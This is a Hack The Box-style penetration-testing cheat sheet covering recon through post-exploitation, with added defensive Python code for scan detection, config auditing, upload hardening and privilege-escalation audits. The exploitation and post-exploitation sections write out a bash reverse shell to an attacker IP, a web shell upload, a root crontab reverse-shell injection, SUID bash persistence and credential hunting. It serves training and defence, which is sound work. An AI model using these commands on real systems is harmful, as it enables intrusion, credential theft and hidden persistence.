1. RECONNAISSANCE

Passive info gathering - target can't detect you

```bash
# Domain/IP lookup
whois target.com
nslookup target.com
dig target.com ANY

# Subdomain discovery
sublist3r -d target.com
amass enum -d target.com

# Google dorking
site:target.com filetype:pdf
site:target.com inurl:admin

# Social media, job postings (tech stack)
# LinkedIn for employee names
# Job posts revealing tech (MySQL, Apache, etc.)
```

Promising:

- Leaked credentials in pastebin/github
- Subdomains revealing dev/staging environments
- Employee emails for phishing/username enumeration
- Tech stack from job postings

Noise:

- Public marketing info
- Generic company data
- Most HTB boxes skip this phase

2. SCANNING

Active probing - target sees you in logs

```bash
# Host discovery
nmap -sn 10.10.11.0/24

# Port scan
nmap -p- --min-rate 5000 10.10.11.123

# Service/version detection
nmap -sC -sV -p 22,80,443 10.10.11.123

# OS detection
nmap -O 10.10.11.123

# UDP scan
nmap -sU --top-ports 100 10.10.11.123
```

Promising:

- Uncommon ports open (8080, 3000, 8443, 9090)
- Multiple web ports (80, 443, 8080)
- Database ports exposed (3306, 5432, 27017)
- Admin services (3389 RDP, 5985 WinRM, 5900 VNC)

Noise:

- Only SSH on hardened Linux box
- All ports filtered
- Only standard ports with recent software
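The "target sees you in logs" point above is what a defender relies on: a full port scan (`nmap -p-`) hits many ports on one host, and a ping sweep (`nmap -sn`) touches many hosts from one source, both inside a short window. The following is an added example, not part of the original cheat sheet, showing detection logic for both patterns run over constructed iptables-style syslog lines; the log format, the 60-second window and the thresholds (15 ports, 10 hosts) are assumptions to adapt to your own firewall and baseline.

```python
"""Port-scan detection over firewall log lines (added example, not from the cheat sheet)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW_SECONDS = 60     # assumed sliding window
VERTICAL_PORTS = 15     # distinct ports on one host from one source -> port scan
HORIZONTAL_HOSTS = 10   # distinct hosts from one source -> sweep

# Assumed iptables LOG line layout: "<ts> <host> kernel: IN=... SRC=... DST=... PROTO=... [DPT=...]"
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ kernel: IN=\S+ SRC=(?P<src>[\d.]+) "
    r"DST=(?P<dst>[\d.]+) PROTO=(?P<proto>\w+)(?: DPT=(?P<dpt>\d+))?"
)


def parse_line(line, year=2024):
    """Return one event dict, or None for lines that are not firewall hits."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "src": m["src"], "dst": m["dst"], "proto": m["proto"],
            "dpt": int(m["dpt"]) if m["dpt"] else None}


def build_sample_log():
    """Constructed sample: a vertical scan plus a ping sweep from 10.10.14.15,
    and a legitimate client (10.10.11.50) that only uses ports 80 and 443."""
    t0 = datetime(2024, 3, 3, 12, 0, 0)
    fmt = "%b %d %H:%M:%S"
    lines = []
    for i, port in enumerate(range(21, 41)):          # 20 ports on one host
        lines.append(f"{(t0 + timedelta(seconds=i)).strftime(fmt)} fw kernel: IN=eth0 "
                     f"SRC=10.10.14.15 DST=10.10.11.123 PROTO=TCP DPT={port} SYN")
    for i in range(1, 13):                             # ICMP echo to 12 hosts
        lines.append(f"{(t0 + timedelta(seconds=30 + i)).strftime(fmt)} fw kernel: IN=eth0 "
                     f"SRC=10.10.14.15 DST=10.10.11.{i} PROTO=ICMP TYPE=8")
    for i, port in enumerate((80, 443)):               # normal traffic
        lines.append(f"{(t0 + timedelta(seconds=5 + i)).strftime(fmt)} fw kernel: IN=eth0 "
                     f"SRC=10.10.11.50 DST=10.10.11.123 PROTO=TCP DPT={port} SYN")
    return "\n".join(lines)


def detect_scans(log_text, window=WINDOW_SECONDS):
    """Slide a window over each source's events; report vertical and horizontal scans."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev:
            events[ev["src"]].append(ev)
    best = {}  # (kind, src, dst) -> largest count seen in any window
    for src, evs in events.items():
        evs.sort(key=lambda e: e["ts"])
        for i, start in enumerate(evs):
            limit = start["ts"] + timedelta(seconds=window)
            in_window = [e for e in evs[i:] if e["ts"] <= limit]
            hosts, ports_per_host = set(), defaultdict(set)
            for e in in_window:
                hosts.add(e["dst"])
                if e["dpt"] is not None:
                    ports_per_host[e["dst"]].add(e["dpt"])
            for dst, ports in ports_per_host.items():
                if len(ports) >= VERTICAL_PORTS:
                    key = ("vertical", src, dst)
                    best[key] = max(best.get(key, 0), len(ports))
            if len(hosts) >= HORIZONTAL_HOSTS:
                key = ("horizontal", src, None)
                best[key] = max(best.get(key, 0), len(hosts))
    return [{"kind": k[0], "src": k[1], "dst": k[2], "count": n}
            for k, n in sorted(best.items(), key=lambda kv: str(kv[0]))]


if __name__ == "__main__":
    for f in detect_scans(build_sample_log()):
        print(f)
```

The constructed log yields two findings from 10.10.14.15 (a vertical scan of 20 ports on 10.10.11.123 and a sweep of 13 hosts) and nothing for the legitimate client. The thresholds are deliberately low so the sample triggers; on a real network they need tuning against monitoring systems and load balancers that legitimately touch many hosts or ports.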

3. ENUMERATION

Deep dive into each service

```bash
# HTTP/HTTPS
whatweb http://10.10.11.123
nikto -h http://10.10.11.123
curl -I http://10.10.11.123
gobuster dir -u http://10.10.11.123 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

# SMB
enum4linux -a 10.10.11.123
smbclient -L //10.10.11.123 -N
smbmap -H 10.10.11.123

# FTP
ftp 10.10.11.123   # try anonymous
nmap -sV -p 21 --script=ftp-anon 10.10.11.123

# SMTP
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t 10.10.11.123

# SNMP
snmpwalk -v2c -c public 10.10.11.123
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 10.10.11.123

# DNS
dig axfr @10.10.11.123 target.htb

# LDAP (if domain controller)
ldapsearch -x -h 10.10.11.123 -s base

# NFS
showmount -e 10.10.11.123
```

Promising:

- Anonymous FTP access with files
- SMB shares readable/writable
- Web directories expose /admin, /backup, /uploads
- SNMP exposes usernames, processes
- DNS zone transfer works (reveals all subdomains)
- Old versions with known exploits

Noise:

- All services require authentication
- Empty FTP, locked SMB
- Only standard web pages (/css, /js)
- No zone transfer allowed
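Three of the "Promising" findings above (anonymous FTP, guest-readable SMB shares, a zone transfer that succeeds) come straight from service configuration, so the same list doubles as a hardening checklist. The following is an added example, not part of the original cheat sheet, that audits constructed vsftpd.conf, BIND named.conf and smb.conf fragments and shows each weak setting next to its corrected form; the option names are the real ones those daemons use, but the sample configs and the finding wording are constructed here.

```python
"""Config audit for the enumeration findings (added example, not from the cheat sheet)."""
import configparser
import re

# Constructed vsftpd.conf fragments: anonymous login and upload on, then off.
WEAK_VSFTPD = "listen=YES\nanonymous_enable=YES\nanon_upload_enable=YES\nwrite_enable=YES\n"
FIXED_VSFTPD = "listen=YES\nanonymous_enable=NO\nwrite_enable=YES\n"

# Constructed named.conf zone stanzas: AXFR to anyone, then only to the secondary.
WEAK_NAMED = '''zone "target.htb" IN {
    type master;
    file "/etc/bind/db.target.htb";
    allow-transfer { any; };
};
'''
FIXED_NAMED = WEAK_NAMED.replace("{ any; }", "{ 10.10.11.2; }")

# Constructed smb.conf fragments: guest mapping plus a guest-writable share, then locked down.
WEAK_SMB = """[global]
workgroup = WORKGROUP
map to guest = Bad User
[backup]
path = /srv/backup
guest ok = yes
read only = no
"""
FIXED_SMB = """[global]
workgroup = WORKGROUP
map to guest = Never
restrict anonymous = 2
[backup]
path = /srv/backup
guest ok = no
read only = yes
valid users = @backupops
"""


def _kv(text):
    """Parse key=value lines (vsftpd style) into a lower-cased dict."""
    out = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            k, v = line.split("=", 1)
            out[k.strip().lower()] = v.strip().lower()
    return out


def audit_vsftpd(text):
    cfg, findings = _kv(text), []
    if cfg.get("anonymous_enable") == "yes":
        findings.append("vsftpd: anonymous_enable=YES allows unauthenticated logins")
        if cfg.get("anon_upload_enable") == "yes":
            findings.append("vsftpd: anon_upload_enable=YES lets anonymous users upload files")
    return findings


def audit_named(text):
    """Flag zones whose allow-transfer ACL contains 'any', or that set none at all."""
    findings = []
    zones = [(m.start(), m.group(1)) for m in re.finditer(r'zone\s+"([^"]+)"', text)]
    covered = set()
    for m in re.finditer(r"allow-transfer\s*\{([^}]*)\}", text):
        owner = "options"
        for pos, name in zones:          # nearest preceding zone owns this ACL
            if pos < m.start():
                owner = name
        covered.add(owner)
        acl = {x.strip() for x in m.group(1).split(";") if x.strip()}
        if "any" in acl:
            findings.append(f"named: zone {owner} allows AXFR from any host")
    for _, name in zones:
        if name not in covered:
            findings.append(f"named: zone {name} sets no allow-transfer; confirm the options{{}} default restricts AXFR")
    return findings


def audit_smb(text):
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    cp.read_string(text)
    findings = []
    g = cp["global"] if cp.has_section("global") else {}
    if g.get("map to guest", "never").strip().lower() != "never":
        findings.append("smb: 'map to guest' maps failed logins to guest, so null sessions can list shares")
    for section in cp.sections():
        if section == "global":
            continue
        s = cp[section]
        if s.get("guest ok", "no").strip().lower() == "yes":
            writable = (s.get("read only", "yes").strip().lower() == "no"
                        or s.get("writable", "no").strip().lower() == "yes")
            findings.append(f"smb: share [{section}] is readable by guests" + (" and writable" if writable else ""))
    return findings


def audit_all(vsftpd, named, smb):
    return audit_vsftpd(vsftpd) + audit_named(named) + audit_smb(smb)


if __name__ == "__main__":
    print("weak:", audit_all(WEAK_VSFTPD, WEAK_NAMED, WEAK_SMB))
    print("fixed:", audit_all(FIXED_VSFTPD, FIXED_NAMED, FIXED_SMB))
```

The weak set produces five findings and the corrected set produces none. The parsers are intentionally minimal (no include files, no `options {}` inheritance), so treat a clean result as "nothing obviously wrong in this fragment", not as proof the host is hardened.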

4. VULNERABILITY ASSESSMENT

Map findings to exploits

```bash
# Search for version exploits
searchsploit apache 2.4.49
searchsploit -m 50383

# CVE databases
google "service version CVE"
cvedetails.com

# Check default credentials
hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://10.10.11.123

# Web vulnerability scanning
burpsuite (manual testing)
wfuzz for parameter fuzzing
sqlmap for SQL injection
```

Misconfigurations:

- Writable SMB shares
- Anonymous FTP upload
- Default creds (admin:admin)
- Directory listing enabled
- Exposed .git directories

Promising:

- Public exploit available for exact version
- Default credentials work
- SQL injection confirmed
- File upload accepts PHP/executable files
- Weak credentials (admin:password)
- Misconfigured permissions

Noise:

- No matching exploits
- All exploits require authentication you don't have
- Services fully patched
- WAF blocks all attacks

5. EXPLOITATION

Get initial foothold

```bash
# Exploit public CVE
python3 exploit.py 10.10.11.123

# SQL injection to command execution
sqlmap -u "http://10.10.11.123/page.php?id=1" --os-shell

# Upload web shell
curl -F "file=@shell.php" http://10.10.11.123/upload.php
# Access: http://10.10.11.123/uploads/shell.php?cmd=id

# Reverse shell (after getting RCE)
bash -c 'bash -i >& /dev/tcp/10.10.14.15/4444 0>&1'

# Metasploit (if you use it)
msfconsole
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOST 10.10.11.123
exploit

# Listener
nc -lvnp 4444
```

Promising:

- Shell callback received
- Can execute commands
- Web shell responsive
- Credential reuse successful

Noise:

- Exploit fails
- No callback (firewall/wrong payload)
- Access denied
- Wrong architecture/OS
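The web shell step above works only because the upload handler trusts the client's filename and stores the file where the web server will execute it. The following is an added example, not part of the original cheat sheet, that puts a handler with exactly that weakness next to a hardened one: extension allowlist checked against the file's magic bytes, a server-chosen random name, storage outside the webroot with no execute bit, and path components stripped so `../` in the filename cannot escape the directory. The storage layout, the `UploadRejected` exception and the allowlist are assumptions.

```python
"""Vulnerable vs. hardened file upload handling (added example, not from the cheat sheet)."""
import os
import secrets
import tempfile

# Assumed allowlist: extension -> magic bytes the content must start with.
ALLOWED = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "pdf": b"%PDF-"}
MAX_BYTES = 5 * 1024 * 1024


class UploadRejected(ValueError):
    pass


def vulnerable_save(webroot_uploads, filename, content):
    """The pattern the cheat sheet exploits: client-controlled name, stored in the
    served directory, no content check. "shell.php" lands at /uploads/shell.php."""
    path = os.path.join(webroot_uploads, filename)       # "../x" also escapes the directory
    with open(path, "wb") as f:
        f.write(content)
    return path


def hardened_save(storage_dir, filename, content):
    """storage_dir is assumed to be outside the webroot; files are served back
    by a download handler that sets Content-Type from the stored extension."""
    if len(content) > MAX_BYTES:
        raise UploadRejected("file too large")
    base = os.path.basename(filename.replace("\\", "/"))  # drop any directory part
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in ALLOWED:
        raise UploadRejected(f"extension {ext!r} not allowed")
    if not content.startswith(ALLOWED[ext]):
        raise UploadRejected("content does not match the declared type")
    lowered = content.lower()
    if b"<?php" in lowered or b"<script" in lowered:     # reject image/script polyglots
        raise UploadRejected("embedded script content")
    new_name = f"{secrets.token_hex(16)}.{ext}"            # nothing from the client survives
    os.makedirs(storage_dir, exist_ok=True)
    path = os.path.join(storage_dir, new_name)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)  # no execute bit
    with os.fdopen(fd, "wb") as f:
        f.write(content)
    return path


def demo():
    """Run both handlers on constructed uploads; returns what was accepted/rejected."""
    webroot = tempfile.mkdtemp(prefix="uploads_")
    store = tempfile.mkdtemp(prefix="store_")
    png = ALLOWED["png"] + b"\x00" * 32
    results = {"vulnerable": os.path.basename(vulnerable_save(webroot, "shell.php", b"<?php echo 1; ?>"))}
    for name, body in (("shell.php", b"<?php echo 1; ?>"),      # bad extension
                       ("shell.php.png", b"<?php echo 1; ?>"),  # magic mismatch
                       ("photo.png", png + b"<?php echo 1; ?>"),  # polyglot
                       ("../../x.png", png)):                    # traversal attempt
        try:
            results[name] = os.path.dirname(hardened_save(store, name, body)) == store
        except UploadRejected as e:
            results[name] = str(e)
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

In the constructed run the vulnerable handler stores `shell.php` under the served directory, while the hardened one rejects the three malicious uploads and stores the traversal attempt safely inside the storage directory under a random name. Storing outside the webroot is the control that matters most: even if a filter is bypassed, nothing in that directory is ever handed to the PHP interpreter.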

6. POST-EXPLOITATION

Escalate, persist, pivot

```bash
# Situational awareness
whoami
id
hostname
uname -a
cat /etc/os-release
ip a
netstat -tulpn

# Privilege escalation enumeration
sudo -l
find / -perm -4000 2>/dev/null   # SUID
getcap -r / 2>/dev/null
cat /etc/crontab
systemctl list-timers

# Automated enum
wget http://10.10.14.15:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

# Credential hunting
cat /var/www/html/config.php
grep -r "password" /var/www 2>/dev/null
cat /home/*/.bash_history
find / -name "*.db" -o -name "*.conf" 2>/dev/null

# Lateral movement
ssh user2@localhost
su - user2
# Use found credentials/keys

# Privilege escalation
# Example: SUID vim
vim -c ':!/bin/sh'
# Example: writable cron
echo "bash -i >& /dev/tcp/10.10.14.15/5555 0>&1" >> /var/spool/cron/crontabs/root

# Persistence (HTB usually not needed)
cp /bin/bash /tmp/.hidden
chmod 4755 /tmp/.hidden

# Pivoting (if multiple networks)
# SSH tunnel
ssh -L 8080:internal-host:80 user@10.10.11.123
# Port forwarding with chisel
./chisel server -p 8000 --reverse          # attacker
./chisel client 10.10.14.15:8000 R:socks   # victim
```

Promising:

- sudo rights with NOPASSWD
- SUID binary exploitable (GTFOBins)
- Readable /etc/shadow
- Writable cron/systemd jobs as root
- Credentials in config files
- SSH keys for other users
- Multiple network interfaces (pivot opportunity)

Noise:

- No sudo rights
- Standard SUID binaries only
- Can't read other user files
- No scheduled tasks
- No credentials found
- Single network interface
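Every item in the "Promising" list above is a host misconfiguration an administrator can check for before anyone else does: an unexpected SUID binary (the SUID vim and the `/tmp/.hidden` bash copy are both of this kind), a cron or systemd unit writable by non-root users, a world-readable `/etc/shadow`, and `NOPASSWD` sudo rules. The following is an added example, not part of the original cheat sheet, that runs those checks as a baseline audit. It works on a constructed filesystem snapshot so it can be tested offline; `snapshot()` builds the same entries from a live host with `os.lstat`. The SUID baseline, the job directories and the sample sudoers text are assumptions.

```python
"""Privilege-escalation surface audit (added example, not from the cheat sheet)."""
import os
import re
import stat
from typing import NamedTuple


class Entry(NamedTuple):
    path: str
    mode: int   # full st_mode, e.g. 0o104755 for a SUID regular file
    uid: int
    gid: int


# Assumed: where root-run scheduled jobs live on this distribution.
JOB_DIRS = ("/etc/cron", "/var/spool/cron", "/etc/systemd/system")
# Assumed baseline of SUID/SGID binaries the image is known to ship.
BASELINE_SUID = {"/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/mount"}

# Constructed snapshot mirroring the cheat sheet's findings.
SNAPSHOT = [
    Entry("/usr/bin/sudo", 0o104755, 0, 0),
    Entry("/usr/bin/passwd", 0o104755, 0, 0),
    Entry("/usr/bin/vim.basic", 0o104755, 0, 0),                # SUID vim, not in baseline
    Entry("/etc/cron.d/backup", 0o100666, 0, 0),                # world-writable cron file
    Entry("/etc/cron.d/logrotate", 0o100644, 0, 0),             # fine
    Entry("/etc/systemd/system/sync.service", 0o100664, 1000, 1000),  # non-root owner, group-writable
    Entry("/etc/shadow", 0o100644, 0, 42),                      # readable by others
    Entry("/tmp/.hidden", 0o104755, 0, 0),                      # SUID bash copy in /tmp
]
# Constructed sudoers fragment.
SUDOERS = """root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
www-data ALL=(root) NOPASSWD: /usr/bin/vim   # constructed weak rule
"""
NOPASSWD_RE = re.compile(r"^(\S+)\s+\S+=.*?\bNOPASSWD:\s*(.+)$")


def unexpected_suid(entries, baseline=BASELINE_SUID):
    """Root-owned SUID/SGID files that are not in the known-good baseline."""
    return sorted(e.path for e in entries
                  if e.mode & (stat.S_ISUID | stat.S_ISGID) and e.uid == 0 and e.path not in baseline)


def writable_jobs(entries):
    """Scheduled-job files a non-root user could edit."""
    return sorted(e.path for e in entries
                  if e.path.startswith(JOB_DIRS)
                  and (e.mode & (stat.S_IWOTH | stat.S_IWGRP) or e.uid != 0))


def shadow_readable(entries):
    return any(e.path == "/etc/shadow" and e.mode & stat.S_IROTH for e in entries)


def nopasswd_rules(sudoers_text):
    """(user, command) pairs that run without a password; 'ALL' means full root."""
    rules = []
    for line in sudoers_text.splitlines():
        m = NOPASSWD_RE.match(line.split("#", 1)[0].strip())
        if m:
            rules.append((m.group(1), m.group(2).strip()))
    return rules


def audit(entries, sudoers_text, baseline=BASELINE_SUID):
    return {"suid_unexpected": unexpected_suid(entries, baseline),
            "writable_jobs": writable_jobs(entries),
            "shadow_readable": shadow_readable(entries),
            "nopasswd": nopasswd_rules(sudoers_text)}


def snapshot(paths):
    """Build entries from a live host (real os.lstat calls); unreadable paths are skipped."""
    out = []
    for p in paths:
        try:
            st = os.lstat(p)
        except OSError:
            continue
        out.append(Entry(p, st.st_mode, st.st_uid, st.st_gid))
    return out


if __name__ == "__main__":
    for k, v in audit(SNAPSHOT, SUDOERS).items():
        print(f"{k}: {v}")
```

On the constructed snapshot the audit flags `/usr/bin/vim.basic` and `/tmp/.hidden` as unexpected SUID files, both the world-writable cron file and the user-owned systemd unit, the readable shadow file, and the `www-data` NOPASSWD rule. Scheduling this against a per-image baseline and alerting on any new entry is the cheapest way to catch both the misconfiguration and the persistence pattern the cheat sheet describes.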